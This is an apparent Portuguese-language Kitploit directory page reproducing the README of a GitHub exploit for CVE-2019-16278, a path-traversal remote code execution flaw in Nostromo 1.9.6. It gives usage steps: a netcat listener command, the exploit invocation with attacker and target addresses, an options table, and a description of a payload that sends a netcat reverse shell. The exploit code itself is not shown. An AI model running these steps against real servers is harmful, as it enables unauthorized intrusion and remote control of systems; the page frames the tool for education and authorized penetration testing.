Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-16278-Nostromo-1.9.6-RCE — Este repositório contém um exploit para CVE-2019-16278 no servidor web Nostromo 1.9.6, permitindo execução remota de código através de uma vulnerabilidade de traversal de diretórios. O script utiliza pwntools para estabelecer um shell reverso. Apenas para uso educacional e testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/cancela24/cve-2019-16278-nostromo-1.9.6-rce
Geração de PayloadsExploraçãoShellcodeExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubcancela24/cve-2019-16278-nostromo-1.9.6-rce

CVE-2019-16278-Nostromo-1.9.6-RCE

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

1há 1 anoAinda não revisado

Este repositório contém um exploit para CVE-2019-16278 no servidor web Nostromo 1.9.6, permitindo execução remota de código através de uma vulnerabilidade de traversal de diretórios. O script utiliza pwntools para estabelecer um shell reverso. Apenas para uso educacional e testes autorizados.

Compartilhar

CVE-2019-16278-Nostromo-1.9.6-RCE

Este repositório contém um exploit para o CVE-2019-16278 no Nostromo Web Server 1.9.6, permitindo execução remota de código através de uma vulnerabilidade de path traversal. O script utiliza a biblioteca pwntools para estabelecer um reverse shell. Apenas para uso educacional e testes autorizados.

Requisitos

  • Python 3.x
  • pwntools biblioteca

Para instalar o pwntools, use:

root@kitploit:~
pip3 install pwntools

Uso

Configuração

  1. Inicie um Listener: Na máquina atacante, inicie um listener na porta especificada para receber o reverse shell:

    root@kitploit:~
    nc -lvnp <porta-atacante>
    
  2. Execute o Script: Use o seguinte comando para executar o script de exploit. Substitua os valores conforme necessário.

    root@kitploit:~
    python3 exploit.py --attacker-ip <ip-atacante> --attacker-port <porta-atacante> [-t ip-alvo] [-p porta-alvo]
    

Exemplo

root@kitploit:~
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80

Neste exemplo:

  • --attacker-ip 10.10.14.15 é o endereço IP da máquina atacante.
  • --attacker-port 4444 é a porta na qual a máquina atacante está ouvindo o reverse shell.
  • -t 10.10.10.165 especifica o IP alvo (padrão é 10.10.10.165).
  • -p 80 especifica a porta alvo (padrão é 80).

Opções do Script

Fluxo do Script

  1. Mensagem de Aviso: Lembra ao usuário de iniciar um listener na máquina atacante.
  2. Construção do Payload: Monta uma requisição HTTP com o comando do reverse shell usando netcat (nc).
  3. Execução do Payload: Envia o payload ao servidor alvo e tenta receber um reverse shell.
  4. Tentativas: Se a tentativa inicial falhar, o script tenta novamente até 3 vezes com feedback em cada tentativa.

Exemplo de Fluxo do Código

Se bem-sucedido, você deve receber um reverse shell no seu listener com acesso ao sistema alvo.

Aviso Legal

Este script é destinado apenas para fins educacionais e testes autorizados. O acesso não autorizado a sistemas de computadores é ilegal. O autor e os colaboradores não se responsabilizam por qualquer uso indevido ou danos causados por esta ferramenta. Utilize-a de forma responsável e apenas em sistemas que você tenha permissão para testar.

Baixar ferramenta
OpçãoDescriçãoPadrão
-t, --targetEndereço IP do host remoto10.10.10.165
-p, --portPorta do host remoto a ser alvo80
--attacker-ipEndereço IP da máquina atacante para o reverse shellNenhum (obrigatório)
--attacker-portPorta da máquina atacante para o reverse shellNenhum (obrigatório)